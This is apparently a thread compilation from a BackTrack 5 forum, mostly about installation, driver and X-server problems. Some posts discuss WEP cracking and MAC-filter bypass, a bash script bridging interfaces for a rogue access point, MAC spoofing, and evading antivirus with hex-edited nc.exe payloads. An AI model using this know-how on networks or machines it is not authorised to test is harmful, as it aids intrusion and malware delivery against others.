After some trial and error I really managed to find out what MAC-Address is allowed (without cheating) and crack my WEP password. Pretty simple when you get the hang of it.

So I told a friend of mine, who is more or less at the same knowledge level as me, and he was impressed but had a valid claim:

What, if there is no DHCP-Mode but a fixed subnet or even fixed IPs bound to a certain MAC-Address?

I decided to try the easier version first, disabled DHCP and set the subnet mask to 255.255.255.0, the router IP to 10.100.100.6 and my netbook's IP to 10.100.100.12.

But here is where I don't get any further... How can I see what subnet mask is used and what IPs are present on the network from outside, only having the MAC-Addresses and the WEP key?

I'm having a hard time getting my Aironet 350 (AIR-CB21AG-A-K9) working with BT5. I've been searching around and trying different things for the past few hours and still no go. Does anyone have any experience with getting this card to work on the BT distro? I would welcome any advice you can give me! This has been my favorite card for years, and I would love to get it working.

Does it mean it doesn't support injection, so I can't capture a WPA handshake?
By the way, I captured a WEP key before, but the authentication often fails; I got it once by chance and went on to capture the IVs.
I have a Signal King 9 dBi antenna; it isn't doing well so I'm aiming to buy a new one.
Any suggestions?
Sorry for my bad English.

Quote:
root@bt:~# kmail
kmail: error while loading shared libraries: libkontactinterface.so.4: cannot open shared object file: No such file or directory
root@bt:~#
kmail doesn't open on BT5; how do I get it working?
Thanks

Hi, after successfully running an injection test on my AP using aireplay-ng I went to my router (D-Link WBR-1310) to look at the logs to see if I could see the MAC of the adapter. I clicked all options in the menu but found nothing. Currently using firmware version 4.13 for the router; if anyone who has the router knows where to look, could you please tell me (I can see my stations but not my wifi card's MAC). Or is aireplay-ng passive?

I have Win7 Home Premium 64-Bit installed on my laptop (Asus K52F). I left enough room for a Linux installation when I installed it.

I went to go install BT5 the other day. It boots the live USB fine, installs fine. I booted from my HD, installed all updates, then ran "startx". This just brought me to a black screen, and nothing happens from here.

I'm fairly sure this is a driver issue, but I'm not sure. I also don't know how I'd go about fixing this. I'm just using the integrated Intel GMA HD Graphics, my CPU is an i3-350m. Chipset is HM55.

After downloading and burning the BT5 ISO file (64-bit with KDE), is it safe to boot from this DVD?
I mean: does it automatically boot only as a LiveCD, without starting an installation and without changing anything in the MBR and partitions? I really hope so...
I have to ask that because I have only one working machine at hand, and it is the productive one...;)
(That's the lack of budget, because I am trying to collect enough money to be able to pay for the BT online training and certification.)
As far as I understand, my hard drive will remain untouched as long as I don't execute Install.sh . Correct?

If it helps to avoid flaming: I have some basic skills with Linux and Windows, and I know what an MBR is and what partitions and bootloaders are.
I just don't have any experience with the BT distro yet and I want to avoid destroying my productive machine.
Using BT inside VMware is not an alternative in my case, because as far as I know it wouldn't support the built-in WLAN adapter of my notebook that way. Right?

OK, I'm new to using Linux. I'm using Ubuntu (latest version), and I'm not getting anywhere with this download :confused: OK, so I downloaded the BT5 direct 32-bit KDE ISO.
I see it in my downloads (Ubuntu). I can burn a copy to DVD, but it says it fails after download. When I use the md5sum command in the terminal, I get a file not found message. I need to know what to do. Am I downloading it wrong? Getting a corrupted file, or something more sinister :cool: Any help would be very appreciated, thanks.

Seems to be a bug on this version with the Nvidia driver. I have had to reinstall NVIDIA 3 times now to get startx to work. When I shut down and reboot it has (but not every time) an error starting startx.
Has anyone come across this? Any known fix would be great; it's getting annoying lol

First of all, I'm new here and I wanted to say hello to all of you.
I've used BT 4 for a long time as a live distro, but now with the release of BT 5 I decided to install it as my second OS with the GNOME desktop. After the installation, I couldn't start the X server. After searching the web for a solution, I edited the parameter GRUB_CMDLINE_LINUX_DEFAULT in the /etc/default/grub file. I removed the "nomodeset" string and updated grub. After reboot I could start the X server and my graphics were OK, but I cannot change the resolution and use the 3D effects because the proprietary drivers aren't installed. I'm using an Nvidia GeForce 7025. So I tried to install the nvidia-current package via apt, and after installation I was asked if I wanted to create an xorg.conf file because no xorg file was found on the system. Alright, on BT 5 it seems that there is really no xorg.conf file in the default directory /etc/X11. So I confirmed the dialog with OK and rebooted my system. But after reboot, I am not able to start the X server any more. Can you please help me? I grow desperate.....

I'm trying to run BackTrack 5 - GNOME - 64-bit on a USB stick with persistence, and I am having a lot of problems. I've already had to format and reinstall at least 15 times, but I always run into problems after a while. Some of them seem to happen when I try to update. Let me be more specific. First of all, I use the tutorial posted here on running BT5 + Metasploit + PostgreSQL. It works fine, but after I restart, when BackTrack boots, even before I do startx I keep getting the error

EXT2-fs loop1 deleted inode referenced

If I uninstall PostgreSQL then this error disappears. But I don't understand what PostgreSQL even has to do with this error. Sometimes it reappears again later, like 3 days later. Also, what sometimes happens just out of the blue is that I keep getting Input/output errors. For example, let's say in the home directory I have a file called foo.txt, and I run

ls

and the output shows

Can't read foo.txt: Input/output error

This happened to me last time when I tried to update: it happened on many files, and they couldn't be updated. This then pretty much makes the system unusable. Additionally, sometimes when I restart and run startx, the window manager opens and many colors in the interface are different; the terminal doesn't have the BackTrack 5 background anymore.

These are some of the problems I have. Is anyone else having similar issues, or does anyone know what I can do to fix them? I tried installing to the USB using UNetbootin, Universal USB Installer, and LinuxLive USB Creator, and all of them give the same errors. I also checked my USB drive for errors, and none were found. It is also pretty new; I just got it one month ago specifically to run BackTrack on it, so it should be working.

I'm new to the site, but know the power of BT. My laptop is a preloaded WIN7 one. So I need to install BT7 alongside WIN7. I have a clean unpartitioned space on my hard disk to install BT. But when I'm going to install it, it's not giving the option "guided partition on selected part of hard drive". It just shows me the guided full hard disk option to install BT. What can the problem be? Any hint will be highly appreciated. I will post my partition table details for your reference.

Hello, I am running BackTrack 5 KDE 32-bit on my ASUS P6X58D Premium and am running into problems when attempting to install the sound drivers from the manufacturer's drivers CD.
Under KMix I do not have any devices listed, nor in Settings>System Settings>Multimedia when I attempt a sound test.

Feedback looks normal until the end of the installation when I receive
Code:
find /lib/modules/2.6.38/kernel/sound -name 'snd*.*o' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'snd*.*o.gz' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'ac97_bus.*o' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'ac97_bus.*o.gz' | xargs rm -f
make[1]: Entering directory `/root/Desktop/via-linux-audiopackV1.91Beta6/alsa-driver-1.0.18a/acore'
mkdir -p /lib/modules/2.6.38/kernel/sound/acore
cp snd-hwdep.ko snd-page-alloc.ko snd-pcm.ko snd-timer.ko snd.ko /lib/modules/2.6.38/kernel/sound/acore
cp: cannot stat `snd-hwdep.ko': No such file or directory
cp: cannot stat `snd-page-alloc.ko': No such file or directory
cp: cannot stat `snd-pcm.ko': No such file or directory
cp: cannot stat `snd-timer.ko': No such file or directory
cp: cannot stat `snd.ko': No such file or directory
make[1]: *** [modules_install] Error 1
make[1]: Leaving directory `/root/Desktop/via-linux-audiopackV1.91Beta6/alsa-driver-1.0.18a/acore'
make: *** [install-modules] Error 1
Reload driver...
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-page-alloc.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-timer.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-pcm.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-hwdep.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-codec.ko': No such file or directory
FATAL: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-intel.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-page-alloc.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-timer.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-pcm.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-hwdep.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-codec.ko': No such file or directory
FATAL: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-intel.ko': No such file or directory
********************************************************************************
*** WARINING: Need to reboot to activate the new driver!
********************************************************************************

So I am trying to start a spoofed AP using airbase-ng and dhcpd3. I can start airbase just fine, but I hit a road block when I try to get an IP. I can run dhcp. Everything works fine and dandy UNTIL I try to connect to an outside source (like google.com). I can assign IPs just fine, but after that it just doesn't want to work.
So this is the script I wrote to set up dhcp and bridge my adapters
Code:
#! /bin/bash
ifconfig at0 up
ifconfig eth0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
#This command copies a conf file from my usb drive into dhcp3. This makes it easier to edit the files on the go.
cp evil.conf /etc/dhcp3/evil.conf

#So this bridges my interfaces
brctl addbr mitm
brctl addif mitm eth0
brctl addif mitm at0
ifconfig mitm up
Next I use this to destroy all my settings so I can get internet again (once I run that script I lose the internet until I run this script)
Code:
#! /bin/bash

Hi, in my desktop I have an Ethernet card and a wireless PCI card (D-Link DWA 552) as well. When accessing an AP, is it necessary to spoof the MAC for the Ethernet card (eth0)?

If the wireless card will be doing all the work, then I will only need to spoof the MAC for the wireless card, correct? So if only the wireless card is sending packets and probes it isn't necessary to mask Ethernet because the AP won't be receiving any data from the Ethernet card. Or is it possible the AP might receive Ethernet card data somehow (when the D-Link card sends packets, maybe it sends Ethernet card info too)? In which case I would have to spoof it for authentication? Or change it in case of MAC filtering?

I'm thinking I just leave it alone, and only spoof wireless card MAC..

I have some very light Linux experience over the last year, and my new job will require me to use BackTrack extensively for the foreseeable future. We are allowed to use our personal laptops when we are performing off-site testing for clients and I am looking for a replacement for my current 4+ year old clunker.

I don't have any excessive hardware requirements, nor do I have an unlimited budget (<600 estimated), but what would your recommendation be for a good laptop that doesn't have any annoying drive or chipset issues? Only other factor I am even considering is a good quality wireless chipset.

I am looking forward to using this excellent software. Thank you in advance for your thoughts and assistance.

I posted a comment in a thread recently about AV picking up custom executables created as a payload, even following encoding multiple times with one or more encoders. As far as I understand it, the AVs are picking up a signature related to how Meterpreter creates the executable, rather than the content of the payload. I know that I can create an executable that isn't picked up by AVs (such as a hex-edited version of nc.exe or one with a code cave), but can I use that as the payload which is uploaded and run on the target system when the exploit has completed? I came across the custom.rb script but that's only become available within the last couple of weeks and I'm not sure it would allow me to do what I would like.

I know that I could use such a hex-edited executable packaged with a legitimate installer and use Social Engineering to have a victim run it, but I would like to go down the route of finding some software vulnerability (such as Adobe) or an unpatched vulnerability in the Windows Operating system.

Question(s):
1. Are there any EULA issues that would preclude commercial use of BT5 on an enterprise environment, i.e. is it still free or does commercial use incur a cost?
2. Is there any documentation available or anywhere I can go to determine whether BackTrack 5 is "safe," i.e. it doesn't have any backdoors, malware, trojans, etc.? I know we can confirm the ISO using the MD5 hash and I am aware that some entities in the US gov't use various versions of BackTrack, but other than that loose association, I was hoping for something more definitive.